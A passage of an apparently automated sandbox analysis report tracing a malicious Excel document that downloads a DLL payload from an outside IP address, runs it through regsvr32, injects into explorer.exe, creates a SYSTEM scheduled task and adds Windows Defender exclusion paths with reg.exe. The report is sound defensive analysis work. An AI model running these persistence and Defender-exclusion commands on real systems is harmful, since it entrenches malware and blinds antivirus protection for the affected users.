00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249169185.250.148.21380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      TimestampkBytes transferredDirectionData
      Sep 27, 2021 18:03:00.392646074 CEST811OUTGET /44466.7516903935.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 185.250.148.213
      Connection: Keep-Alive
      Sep 27, 2021 18:03:00.667790890 CEST812INHTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 16:03:00 GMT
      Content-Type: application/octet-stream
      Content-Length: 387072
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.7516903935.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL;a! p| .text `.edatap @@.data 0@.dataTP$@.rdatatH@.rsrc @@P0PPPHPP


      Code Manipulations

      Statistics

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 2712 Parent PID: 596

      General

      Start time:18:02:22
      Start date:27/09/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f340000
      File size:28253536 bytes
      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 1980 Parent PID: 2712

      General

      Start time:18:02:32
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1312 Parent PID: 1980

      General

      Start time:18:02:32
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd.red
      Imagebase:0x70000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 2124 Parent PID: 1312

      General

      Start time:18:02:34
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 3040 Parent PID: 2712

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd1.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: schtasks.exe PID: 2592 Parent PID: 2124

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16
      Imagebase:0x120000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1760 Parent PID: 3040

      General

      Start time:18:02:35
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd1.red
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 2848 Parent PID: 1672

      General

      Start time:18:02:37
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 2988 Parent PID: 1760

      General

      Start time:18:02:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2952 Parent PID: 2848

      General

      Start time:18:02:38
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2520 Parent PID: 2712

      General

      Start time:18:02:39
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd2.red
      Imagebase:0xffd20000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 2544 Parent PID: 2952

      General

      Start time:18:02:40
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 3060 Parent PID: 2520

      General

      Start time:18:02:40
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd2.red
      Imagebase:0x6e0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2976 Parent PID: 2544

      General

      Start time:18:02:42
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'
      Imagebase:0xff800000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 284 Parent PID: 3060

      General

      Start time:18:02:42
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xdc0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2132 Parent PID: 2544

      General

      Start time:18:02:43
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0'
      Imagebase:0xffcf0000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: WMIADAP.exe PID: 2988 Parent PID: 896

      General

      Start time:18:03:19
      Start date:27/09/2021
      Path:C:\Windows\System32\wbem\WMIADAP.exe
      Wow64 process (32bit):false
      Commandline:wmiadap.exe /F /T /R
      Imagebase:0xff6f0000
      File size:182784 bytes
      MD5 hash:005247E3057BC5D5C3F8C6F886FFC10C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 1704 Parent PID: 1672

      General

      Start time:18:04:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffd30000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2076 Parent PID: 1704

      General

      Start time:18:04:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xf30000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

      Reset < >